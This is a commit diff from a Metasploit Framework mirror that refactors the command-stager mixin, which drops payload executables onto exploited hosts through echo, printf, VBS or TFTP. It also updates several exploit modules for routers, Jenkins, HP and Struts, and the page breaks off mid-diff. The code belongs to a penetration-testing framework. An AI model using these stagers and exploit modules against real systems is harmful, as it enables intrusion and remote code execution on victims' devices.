infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #2484, @zeroSteiner's refactoring for CmdStager

bug/bundler_fix
jvazquez-r7 2014-07-03 11:33:46 -05:00
parent b15297eee0 c041682c9b
commit 51695c4932
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
51 changed files with 1145 additions and 507 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

300
lib/msf/core/exploit/cmdstager.rb
View File

@ -5,93 +5,315 @@ require 'msf/core/exploit/exe'
module Msf
###
#
# This mixin provides an interface to generating cmdstagers
#
###
module Exploit::CmdStager
include Msf::Exploit::EXE
# Constant for stagers - used when creating an stager instance.
STAGERS = {
:bourne => Rex::Exploitation::CmdStagerBourne,
:debug_asm => Rex::Exploitation::CmdStagerDebugAsm,
:debug_write => Rex::Exploitation::CmdStagerDebugWrite,
:echo => Rex::Exploitation::CmdStagerEcho,
:printf => Rex::Exploitation::CmdStagerPrintf,
:vbs => Rex::Exploitation::CmdStagerVBS,
:vbs_adodb => Rex::Exploitation::CmdStagerVBS,
:tftp => Rex::Exploitation::CmdStagerTFTP
}
# Constant for decoders - used when checking the default flavor decoder.
DECODERS = {
:debug_asm => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm"),
:debug_write => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write"),
:vbs => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64"),
:vbs_adodb => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")
}
attr_accessor :stager_instance
attr_accessor :cmd_list
attr_accessor :flavor
attr_accessor :decoder
attr_accessor :exe
# Creates an instance of an exploit that uses an CMD Stager and register the
# datastore options provided by the mixin.
#
# Creates an instance of an exploit that uses an CmdStager overwrite.
#
# @param info [Hash] Hash containing information to initialize the exploit.
# @return [Msf::Module::Exploit] the exploit module.
def initialize(info = {})
super
@cmd_list = nil
@stager_instance = nil
flavors = module_flavors
flavors = STAGERS.keys if flavors.empty?
flavors.unshift('auto')
register_advanced_options(
[
OptEnum.new('CMDSTAGER::FLAVOR', [false, 'The CMD Stager to use.', 'auto', flavors]),
OptString.new('CMDSTAGER::DECODER', [false, 'The decoder stub to use.'])
], self.class)
end
# Executes the command stager while showing the progress. This method should
# be called from exploits using this mixin.
#
# Execute the command stager while showing the progress
#
# @param opts [Hash] Hash containing configuration options. Also allow to
# send opts to the Rex::Exploitation::CmdStagerBase constructor.
# @option opts :flavor [Symbol] The CMD Stager to use.
# @option opts :decoder [Symbol] The decoder stub to use.
# @option opts :delay [Float] Delay between command executions.
# @return [void]
def execute_cmdstager(opts = {})
cmd_list = generate_cmdstager(opts)
self.cmd_list = generate_cmdstager(opts)
execute_cmdstager_begin(opts)
stager_instance.setup(self)
sent = 0
total_bytes = 0
cmd_list.each { |cmd| total_bytes += cmd.length }
begin
execute_cmdstager_begin(opts)
delay = opts[:delay]
delay ||= 0.25
sent = 0
total_bytes = 0
cmd_list.each { |cmd| total_bytes += cmd.length }
cmd_list.each do |cmd|
execute_command(cmd, opts)
sent += cmd.length
delay = opts[:delay]
delay ||= 0.25
# In cases where a server has multiple threads, we want to be sure that
# commands we execute happen in the correct (serial) order.
::IO.select(nil, nil, nil, delay)
cmd_list.each do |cmd|
execute_command(cmd, opts)
sent += cmd.length
progress(total_bytes, sent)
# In cases where a server has multiple threads, we want to be sure that
# commands we execute happen in the correct (serial) order.
::IO.select(nil, nil, nil, delay)
progress(total_bytes, sent)
end
execute_cmdstager_end(opts)
ensure
stager_instance.teardown(self)
end
execute_cmdstager_end(opts)
end
#
# Generates a cmd stub based on the current target's architecture
# and operating system.
# and platform.
#
# @param opts [Hash] Hash containing configuration options. Also allow to
# send opts to the Rex::Exploitation::CmdStagerBase constructor.
# @option opts :flavor [Symbol] The CMD Stager to use.
# @option opts :decoder [Symbol] The decoder stub to use.
# @param pl [String] String containing the payload to execute
# @return [Array] The list of commands to execute
# @raise [ArgumentError] raised if the cmd stub can not be generated
def generate_cmdstager(opts = {}, pl = nil)
pl ||= payload.encoded
select_cmdstager(opts)
@exe = generate_payload_exe
self.exe = generate_payload_exe(:code => pl)
@stager_instance = create_stager(@exe)
cmd_list = @stager_instance.generate(opts)
self.stager_instance = create_stager
cmd_list = stager_instance.generate(opts_with_decoder(opts))
if (cmd_list.nil? or cmd_list.length < 1)
if (cmd_list.nil? || cmd_list.length < 1)
print_error("The command stager could not be generated")
raise ArgumentError
end
@cmd_list = cmd_list
cmd_list
end
#
# Show the progress of the upload
# Show the progress of the upload while cmd staging
#
# @param total [Float] The total number of bytes to send
# @param sent [Float] The number of bytes sent
# @return [void]
def progress(total, sent)
done = (sent.to_f / total.to_f) * 100
percent = "%3.2f%%" % done.to_f
print_status("Command Stager progress - %7s done (%d/%d bytes)" % [percent, sent, total])
end
# Selects the correct cmd stager and decoder stub to use
#
# Methods to override - not used internally
# @param opts [Hash] Hash containing the options to select te correct cmd
# stager and decoder.
# @option opts :flavor [Symbol] The cmd stager to use.
# @option opts :decoder [Symbol] The decoder stub to use.
# @return [void]
# @raise [ArgumentError] raised if a cmd stager can not be selected or it
# isn't compatible with the target platform.
def select_cmdstager(opts = {})
self.flavor = select_flavor(opts)
raise ArgumentError, "Unable to select CMD Stager" if flavor.nil?
raise ArgumentError, "The CMD Stager '#{flavor}' isn't compatible with the target" unless compatible_flavor?(flavor)
self.decoder = select_decoder(opts)
end
# Returns a hash with the :decoder option if possible
#
# @params opts [Hash] Input Hash.
# @return [Hash] Hash with the input data and a :decoder option when
# possible.
def opts_with_decoder(opts = {})
return opts if opts.include?(:decoder)
return opts.merge(:decoder => decoder) if decoder
opts
end
# Create an instance of the flavored stager.
#
# @return [Rex::Exploitation::CmdStagerBase] The cmd stager to use.
# @raise [NoMethodError] raised if the flavor doesn't exist.
def create_stager
STAGERS[flavor].new(exe)
end
# Returns the default decoder stub for the input flavor.
#
# @param f [Symbol] the input flavor.
# @return [Symbol] the decoder.
# @return [nil] if there isn't a default decoder to use for the current
# cmd stager flavor.
def default_decoder(f)
DECODERS[f]
end
# Selects the correct cmd stager decoder to use based on three rules: (1) use
# the decoder provided in input options, (2) use the decoder provided by the
# user through datastore options, (3) select the default decoder for the
# current cmd stager flavor if available.
#
# @param opts [Hash] Hash containing the options to select te correct
# decoder.
# @option opts :decoder [String] The decoder stub to use.
# @return [String] The decoder.
# @return [nil] if a decoder can not be selected.
def select_decoder(opts = {})
return opts[:decoder] if opts.include?(:decoder)
return datastore['CMDSTAGER::DECODER'] unless datastore['CMDSTAGER::DECODER'].blank?
default_decoder(flavor)
end
# Selects the correct cmd stager to use based on three rules: (1) use the
# flavor provided in options, (2) use the flavor provided by the user
# through datastore options, (3) guess the flavor using the target platform.
#
# @param opts [Hash] Hash containing the options to select te correct cmd
# stager
# @option opts :flavor [Symbol] The cmd stager flavor to use.
# @return [Symbol] The flavor to use.
# @return [nil] if a flavor can not be selected.
def select_flavor(opts = {})
return opts[:flavor].to_sym if opts.include?(:flavor)
unless datastore['CMDSTAGER::FLAVOR'].blank? or datastore['CMDSTAGER::FLAVOR'] == 'auto'
return datastore['CMDSTAGER::FLAVOR'].to_sym
end
guess_flavor
end
# Guess the cmd stager flavor to use using information from the module,
# target or platform.
#
# @return [Symbol] The cmd stager flavor to use.
# @return [nil] if the cmd stager flavor can not be guessed.
def guess_flavor
# First try to guess a compatible flavor based on the module & target information.
unless target_flavor.nil?
case target_flavor.class.to_s
when 'Array'
return target_flavor[0].to_sym
when 'String'
return target_flavor.to_sym
when 'Symbol'
return target_flavor
end
end
# Second try to guess a compatible flavor based on the target platform.
return nil unless target_platform.names.length == 1
c_platform = target_platform.names.first
case c_platform
when /linux/i
:bourne
when /osx/i
:bourne
when /unix/i
:bourne
when /win/i
:vbs
else
nil
end
end
# Returns all the compatible stager flavors specified by the module and each
# of it's targets.
#
# @return [Array] the list of all compatible cmd stager flavors.
def module_flavors
flavors = []
flavors += Array(module_info['CmdStagerFlavor']) if module_info['CmdStagerFlavor']
targets.each do |target|
flavors += Array(target.opts['CmdStagerFlavor']) if target.opts['CmdStagerFlavor']
end
flavors.uniq!
flavors.map { |flavor| flavor.to_s }
end
# Returns the compatible stager flavors for the current target or module.
#
# @return [Array] the list of compatible cmd stager flavors.
# @return [Symbol] the compatible cmd stager flavor.
# @return [String] the compatible cmd stager flavor.
# @return [nil] if there isn't any compatible flavor defined.
def target_flavor
return target.opts['CmdStagerFlavor'] if target && target.opts['CmdStagerFlavor']
return module_info['CmdStagerFlavor'] if module_info['CmdStagerFlavor']
nil
end
# Answers if the input flavor is compatible with the current target or module.
#
# @param f [Symbol] The flavor to check
# @returns [Boolean] true if compatible, false otherwise.
def compatible_flavor?(f)
return true if target_flavor.nil?
case target_flavor.class.to_s
when 'String'
return true if target_flavor == f.to_s
when 'Array'
target_flavor.each { |tr| return true if tr.to_sym == f }
when 'Symbol'
return true if target_flavor == f
end
false
end
# Code to execute before the cmd stager stub. This method is designed to be
# overriden by a module this mixin.
#
# @param opts [Hash] Hash of configuration options.
def execute_cmdstager_begin(opts)
end
# Code to execute after the cmd stager stub. This method is designed to be
# overriden by a module this mixin.
#
# @param opts [Hash] Hash of configuration options.
def execute_cmdstager_end(opts)
end
end
# Code to execute each command from the. This method is designed to be
# overriden by a module using this mixin.
#
# @param opts [Hash] Hash of configuration options.
def execute_command(cmd, opts)
raise NotImplementedError
end
end
end

21
lib/msf/core/exploit/cmdstager_bourne.rb
View File

@ -1,21 +0,0 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
###
#
# This mixin provides an interface for staging cmd to arbitrary payloads
#
###
module Exploit::CmdStagerBourne
include Msf::Exploit::CmdStager
def create_stager(exe)
Rex::Exploitation::CmdStagerBourne.new(exe)
end
end
end

41
lib/msf/core/exploit/cmdstager_debug_asm.rb
View File

@ -1,41 +0,0 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
###
#
# This mixin provides an interface for staging cmd to arbitrary payloads
#
###
module Exploit::CmdStagerDebugAsm
include Msf::Exploit::CmdStager
def initialize(info = {})
super
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The debug.exe assembly listing decoder stub to use.',
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_asm")]),
], self.class)
end
def create_stager(exe)
Rex::Exploitation::CmdStagerDebugAsm.new(exe)
end
def execute_cmdstager(opts = {})
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
def generate_cmdstager(opts = {}, pl = nil)
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
end
end

41
lib/msf/core/exploit/cmdstager_debug_write.rb
View File

@ -1,41 +0,0 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
###
#
# This mixin provides an interface for staging cmd to arbitrary payloads
#
###
module Exploit::CmdStagerDebugWrite
include Msf::Exploit::CmdStager
def initialize(info = {})
super
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The debug.exe file-writing decoder stub to use.',
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_write")]),
], self.class)
end
def create_stager(exe)
Rex::Exploitation::CmdStagerDebugWrite.new(exe)
end
def execute_cmdstager(opts = {})
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
def generate_cmdstager(opts = {}, pl = nil)
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
end
end

34
lib/msf/core/exploit/cmdstager_echo.rb
View File

@ -1,34 +0,0 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
####
# Allows for staging cmd to arbitrary payloads through the CmdStagerEcho.
#
# This stager uses the echo's "-e" flag, that enable interpretation of
# backslash escapes, to drop an ELF with the payload embedded to disk.
# The "-e" flag is usually available on linux environments. This stager
# has been found useful on restricted linux based embedded devices, and
# should work on either:
# * Systems with busy box's echo binary somewhere in $PATH.
# * Systems with bash/zsh whose echo builtin supports -en flags.
# * Systems with GNU coreutils echo which supports -en flags.
#
####
module Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
# Initializes a CmdStagerEcho instance for the supplied payload
#
# @param exe [String] The payload embedded into an ELF
# @return [Rex::Exploitation::CmdStagerEcho] Stager instance
def create_stager(exe)
Rex::Exploitation::CmdStagerEcho.new(exe)
end
end
end

27
lib/msf/core/exploit/cmdstager_printf.rb
View File

@ -1,27 +0,0 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
####
# Allows for staging cmd to arbitrary payloads through the CmdStagerPrintf.
#
# This stager uses a POSIX-conformant printf, that supports the interpretation
# of octal escapes, to drop an ELF with the payload embedded to disk.
####
module Exploit::CmdStagerPrintf
include Msf::Exploit::CmdStager
# Initializes a CmdStagerPrintf instance for the supplied payload
#
# @param exe [String] The payload embedded into an ELF
# @return [Rex::Exploitation::CmdStagerPrintf] Stager instance
def create_stager(exe)
Rex::Exploitation::CmdStagerPrintf.new(exe)
end
end
end

67
lib/msf/core/exploit/cmdstager_tftp.rb
View File

@ -1,67 +0,0 @@
# -*- coding: binary -*-
require 'rex/text'
require 'msf/core/exploit/tftp'
require 'msf/core/exploit/cmdstager'
module Msf
###
#
# This mixin provides an interface for staging cmd to arbitrary payloads
#
###
module Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::TFTPServer
def initialize(info = {})
super
register_advanced_options(
[
OptString.new( 'TFTPHOST', [ false, 'The address of the machine hosting the file via TFTP.' ]),
OptString.new( 'TFTPRSRC', [ false, 'The filename of the TFTP-hosted resource.' ]),
], self.class)
end
def create_stager(exe)
Rex::Exploitation::CmdStagerTFTP.new(exe)
end
def execute_cmdstager(opts = {})
tftphost = datastore['TFTPHOST']
tftphost ||= datastore['SRVHOST']
tftphost ||= datastore['LHOST']
@exe_tag = datastore['TFTPRSRC']
@exe_tag ||= Rex::Text.rand_text_alphanumeric(8)
opts.merge!({ :tftphost => tftphost, :transid => @exe_tag })
super
end
#
# Start the service and register the file
#
def execute_cmdstager_begin(opts)
start_service(@exe_tag, @exe)
end
#
# Stop the service
#
def execute_cmdstager_end(opts)
stop_service
end
def payload_exe
return nil if not @stager_instance
@stager_instance.payload_exe
end
end
end

41
lib/msf/core/exploit/cmdstager_vbs.rb
View File

@ -1,41 +0,0 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
###
#
# This mixin provides an interface for staging cmd to arbitrary payloads
#
###
module Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64")]),
], self.class)
end
def create_stager(exe)
Rex::Exploitation::CmdStagerVBS.new(exe)
end
def execute_cmdstager(opts = {})
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
def generate_cmdstager(opts = {}, pl = nil)
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
end
end

41
lib/msf/core/exploit/cmdstager_vbs_adodb.rb
View File

@ -1,41 +0,0 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
###
#
# This mixin provides an interface for staging cmd to arbitrary payloads
#
###
module Exploit::CmdStagerVBS::ADODB
include Msf::Exploit::CmdStager
def initialize(info = {})
super
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_adodb")]),
], self.class)
end
def create_stager(exe)
Rex::Exploitation::CmdStagerVBS.new(exe)
end
def execute_cmdstager(opts = {})
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
def generate_cmdstager(opts = {}, pl = nil)
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
super
end
end
end

8
lib/msf/core/exploit/mixins.rb
View File

@ -19,14 +19,6 @@ require 'msf/core/exploit/php_exe'
# CmdStagers
require 'msf/core/exploit/cmdstager'
require 'msf/core/exploit/cmdstager_vbs'
require 'msf/core/exploit/cmdstager_vbs_adodb'
require 'msf/core/exploit/cmdstager_debug_write'
require 'msf/core/exploit/cmdstager_debug_asm'
require 'msf/core/exploit/cmdstager_tftp'
require 'msf/core/exploit/cmdstager_bourne'
require 'msf/core/exploit/cmdstager_echo'
require 'msf/core/exploit/cmdstager_printf'
# Protocol
require 'msf/core/exploit/tcp'

13
lib/rex/exploitation/cmdstager/base.rb
View File

@ -172,6 +172,19 @@ class CmdStagerBase
nil
end
# Should be overriden if the cmd stager needs to setup anything
# before it's executed
def setup(mod = nil)
end
#
# Should be overriden if the cmd stager needs to do any clenaup
#
def teardown(mod = nil)
end
end
end
end

14
lib/rex/exploitation/cmdstager/tftp.rb
View File

@ -27,10 +27,19 @@ class CmdStagerTFTP < CmdStagerBase
def initialize(exe)
super
@payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
end
def setup(mod)
tftp = Rex::Proto::TFTP::Server.new
tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
tftp.start
mod.add_socket(tftp) # Hating myself for doing it... but it's just a first demo
end
def teardown(mod = nil)
tftp.stop
end
#
# We override compress commands just to stick in a few extra commands
@ -54,8 +63,9 @@ class CmdStagerTFTP < CmdStagerBase
# NOTE: We don't use a concatenation operator here since we only have a couple commands.
# There really isn't any need to combine them. Also, the ms01_026 exploit depends on
# the start command being issued separately so that it can ignore it :)
attr_reader :exe
attr_reader :payload_exe
attr_accessor :tftp
end
end
end

8
modules/exploits/linux/http/dlink_authentication_cgi_bof.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -51,8 +51,9 @@ class Metasploit3 < Msf::Exploit::Remote
}
]
],
'DisclosureDate' => 'Feb 08 2013',
'DefaultTarget' => 0))
'DisclosureDate' => 'Feb 08 2013',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
@ -81,6 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavor => :echo,
:linemax => 200,
:concat_operator => " && "
)

8
modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -50,8 +50,9 @@ class Metasploit3 < Msf::Exploit::Remote
}
]
],
'DisclosureDate' => 'Feb 08 2013',
'DefaultTarget' => 0))
'DisclosureDate' => 'Feb 08 2013',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
@ -80,6 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavor => :echo,
:linemax => 200,
:concat_operator => " && "
)

6
modules/exploits/linux/http/fritzbox_echo_exec.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote
}
],
],
'DefaultTarget' => 0
'DefaultTarget' => 0
))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
@ -109,6 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavor => :echo,
:linemax => 92
)
end

7
modules/exploits/linux/http/linksys_themoon_exec.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -62,8 +62,9 @@ class Metasploit3 < Msf::Exploit::Remote
}
],
],
'DefaultTarget' => 0
'DefaultTarget' => 0
))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
@ -115,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
print_status("#{peer} - Exploiting...")
execute_cmdstager
execute_cmdstager({:flavor => :echo})
end
end

6
modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
], self.class)
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
test_login
execute_cmdstager
execute_cmdstager({:flavor => :echo})
end
# Sends an HTTP request with authorization header to the router

7
modules/exploits/linux/misc/sercomm_exec.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStagerEcho
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),
OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),
], self.class)
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
@ -168,7 +168,8 @@ class Metasploit3 < Msf::Exploit::Remote
execute_cmdstager(
:noargs => @no_args,
:temp => @upload_path,
:enc_format => @encoding_format
:enc_format => @encoding_format,
:flavor => :echo
)
end

5
modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb
View File

@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
include REXML
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::Remote::CmdStager
def initialize(info = {})
super(update_info(info,
@ -50,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'HP SiteScope 11.20 / Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
'Platform' => 'win',
'CmdStagerFlavor' => 'vbs'
}
],
[ 'HP SiteScope 11.20 / Linux',

22
modules/exploits/multi/http/hp_sys_mgmt_exec.rb
View File

@ -8,7 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
@ -41,19 +41,23 @@ class Metasploit3 < Msf::Exploit::Remote
[
['Linux', {
'Platform' => 'linux',
'Arch' => ARCH_X86
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'bourne'
}],
['Linux (x64)', {
'Platform' => 'linux',
'Arch' => ARCH_X86_64
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => 'bourne'
}],
['Windows', {
'Platform' => 'win',
'Arch' => ARCH_X86
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'vbs'
}],
['Windows (x64)', {
'Platform' => 'win',
'Arch' => ARCH_X86_64
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => 'vbs'
}],
],
'Privileged' => false,
@ -121,11 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
def setup_stager
case target.opts['Platform']
when "linux" then opts = { :temp => './', :linemax => 2800 }
when "win" then opts = { :temp => '.', :linemax => 2800 }
end
execute_cmdstager(opts)
execute_cmdstager(:temp => './', :linemax => 2800)
end
@ -194,8 +194,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
@cookie = ''
extend Msf::Exploit::CmdStagerBourne if target.opts['Platform'] == "linux"
setup_stager
end
end

7
modules/exploits/multi/http/hyperic_hq_script_console.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
# Tested on Hyperic HQ versions 4.5.2-win32 and 4.6.6-win32 on Windows XP SP3 and Ubuntu 10.04
['Automatic', {} ],
['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win'}],
['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => 'vbs'}],
['Linux', {'Arch' => ARCH_X86, 'Platform' => 'linux' }],
['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}]
],
@ -247,7 +247,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
# login
@ -281,7 +280,7 @@ class Metasploit3 < Msf::Exploit::Remote
# send payload
case @my_target['Platform']
when 'win'
print_status("#{peer} - Sending VBS stager...")
print_status("#{peer} - Sending command stager...")
execute_cmdstager({:linemax => 2049})
when 'unix'
print_status("#{peer} - Sending UNIX payload...")

10
modules/exploits/multi/http/jenkins_script_console.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -33,10 +33,10 @@ class Metasploit3 < Msf::Exploit::Remote
['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console']
],
'Platform' => %w{ win linux unix },
'Targets' =>
'Targets' =>
[
['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win'}],
['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => 'vbs'}],
['Linux', {'Arch' => ARCH_X86, 'Platform' => 'linux' }],
['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}]
],
'DisclosureDate' => 'Jan 18 2013',
@ -169,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote
case target['Platform']
when 'win'
print_status("#{rhost}:#{rport} - Sending VBS stager...")
print_status("#{rhost}:#{rport} - Sending command stager...")
execute_cmdstager({:linemax => 2049})
when 'unix'
print_status("#{rhost}:#{rport} - Sending payload...")

6
modules/exploits/multi/http/netwin_surgeftp_exec.rb
View File

@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => %w{ win unix },
'Targets' =>
[
[ 'Windows', { 'Arch'=>ARCH_X86, 'Platform'=>'win'} ],
[ 'Windows', { 'Arch'=>ARCH_X86, 'Platform'=>'win', 'CmdStagerFlavor' => 'vbs'} ],
[ 'Unix', { 'Arch'=>ARCH_CMD, 'Platform'=>'unix', 'Payload'=>{'BadChars' => "\x22"}} ]
],
'DisclosureDate' => 'Dec 06 2012'))
@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
case target['Platform']
when 'win'
print_status("#{rhost}:#{rport} - Sending VBS stager...")
print_status("#{rhost}:#{rport} - Sending command stager...")
execute_cmdstager({:linemax=>500})
when 'unix'

9
modules/exploits/multi/http/struts_code_exec.rb
View File

@ -8,7 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
['Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
'Platform' => 'win',
'CmdStagerFlavor' => 'tftp'
}
],
['Linux Universal',
@ -88,10 +89,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
execute_cmdstager({ :temp => '.' })
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")

7
modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
View File

@ -8,7 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
@ -45,7 +45,8 @@ class Metasploit3 < Msf::Exploit::Remote
['Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
'Platform' => 'win',
'CmdStagerFlavor' => 'tftp'
}
],
['Linux Universal',
@ -94,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
